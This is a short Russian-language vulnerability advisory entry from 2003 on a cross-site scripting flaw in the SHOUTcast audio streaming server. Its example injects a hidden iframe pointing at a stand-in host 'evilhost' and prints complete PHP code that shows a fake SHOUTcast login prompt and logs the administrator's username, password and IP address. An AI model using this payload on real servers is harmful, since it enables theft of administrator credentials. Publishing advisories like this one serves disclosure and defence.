| Дата публикации: | 06.03.2003 |
| Всего просмотров: | 1860 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | SHOUTcast - Winamp система потокового аудио от Nullsoft. Уязвимость в проверке правильности ввода обнаружена в SHOUTcast сервере. Удаленный пользователь может выполнить XSS нападение против администратора SHOUTcast. Пример: telnet localhost 8001 <IFrame src=http://evilhost/script.php width=0 height=0></iframe>changemeГде script.php:
<?php
$fp = fopen("log.txt","a+");
if (!isset( $_SERVER["PHP_AUTH_USER"] )) {
header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' );
header( 'HTTP/1.0 401 Unauthorized' );
echo '<HTML><HEAD>Unauthorized<title>SHOUTcast
Administrator</title></HEAD></HTML>';
exit;
} else {
fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' .
$_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content);
}
fclose($fp);
?>
Произвольный код сценария будет выполнен в браузере администратора системы, когда он проматривает Log файлы в административном интерфейсе.
|
| Ссылки: | Cross Site Scripting Trick May Fool Shoutcast Admins |